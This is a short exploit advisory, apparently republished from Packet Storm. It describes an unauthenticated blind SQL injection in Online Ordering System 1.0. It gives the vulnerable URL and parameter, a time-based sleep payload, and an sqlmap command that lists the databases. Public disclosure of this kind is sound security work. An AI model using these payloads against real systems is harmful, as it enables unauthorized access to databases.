Online Ordering System 1.0 SQL Injection ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 5th, 2021 📆 | 5885 Views ⚑

0

Online Ordering System 1.0 SQL Injection ≈ Packet Storm

Online Ordering System 1.0 SQL Injection
Posted Mar 4, 2021
Authored by Suraj Bhosale

Online Ordering System version 1.0 suffers from an unauthenticated remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | ae0c87eb9112bb1d4f7b47369ebf0038
# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
# Date: 2021-03-04
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: v1.0
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
# Vulnerable Parameter: id

*Steps to Reproduce:*
1) Visit
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
2) Now fire up the following command into SQLMAP.

CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9
*
--batch --dbs

3) Using the above command we will get the name of all the database.

Source link

Tagged with:



Leave a Reply